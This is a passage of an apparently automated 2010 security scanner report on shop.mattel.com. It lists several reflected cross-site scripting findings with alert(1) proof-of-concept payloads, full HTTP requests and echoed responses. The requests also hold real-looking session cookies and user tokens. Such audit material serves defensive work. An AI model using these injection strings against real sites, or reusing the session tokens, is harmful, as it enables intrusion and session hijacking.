The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 758cb--><script>alert(1)</script>0cca78edec4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /reviews/submitReview.jsp?758cb--><script>alert(1)</script>0cca78edec4=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:30 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 37638
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt ...[SNIP]... <!-- === Request Query String: 758cb--><script>alert(1)</script>0cca78edec4=1 --> ...[SNIP]...
1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/shop/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6ed87--><script>alert(1)</script>0129bd33332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /shop/index.jsp?categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:38 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 --> ...[SNIP]...
1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/shop/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccb6"-alert(1)-"478d101b660 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/index.jsp?categoryId=3719992&fccb6"-alert(1)-"478d101b660=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:37 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/sitemap/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5759d--><script>alert(1)</script>be4ed9b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sitemap/index.jsp?5759d--><script>alert(1)</script>be4ed9b675c=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:32 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 66217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 5759d--><script>alert(1)</script>be4ed9b675c=1 --> ...[SNIP]...
1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/sitemap/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a297a"-alert(1)-"2de4c0c0fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap/index.jsp?a297a"-alert(1)-"2de4c0c0fc=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:31 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 66183
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f83"-alert(1)-"b1391c45b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /storeLocator/index.jsp?b0f83"-alert(1)-"b1391c45b7e=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:26 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a988f--><script>alert(1)</script>da1042d0f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /storeLocator/index.jsp?a988f--><script>alert(1)</script>da1042d0f3d=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:26 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: a988f--><script>alert(1)</script>da1042d0f3d=1 --> ...[SNIP]...
1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b99"-alert(1)-"9bd2d3d4d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.jsp?c7b99"-alert(1)-"9bd2d3d4d38=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:01 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da39a--><script>alert(1)</script>877791f5b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /affiliate/index.jsp?da39a--><script>alert(1)</script>877791f5b35=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:02 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: da39a--><script>alert(1)</script>877791f5b35=1 --> ...[SNIP]...
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ced"-alert(1)-"5910eac9a7a was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?categoryId=3768131c3ced"-alert(1)-"5910eac9a7a HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:57 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 31915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the categoryId request parameter is copied into an HTML comment. The payload 30414--><script>alert(1)</script>ed84d125fcc was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?categoryId=376813130414--><script>alert(1)</script>ed84d125fcc HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:58 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 31947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: categoryId=376813130414--><script>alert(1)</script>ed84d125fcc --> ...[SNIP]...
1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95e25"-alert(1)-"dca41e50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
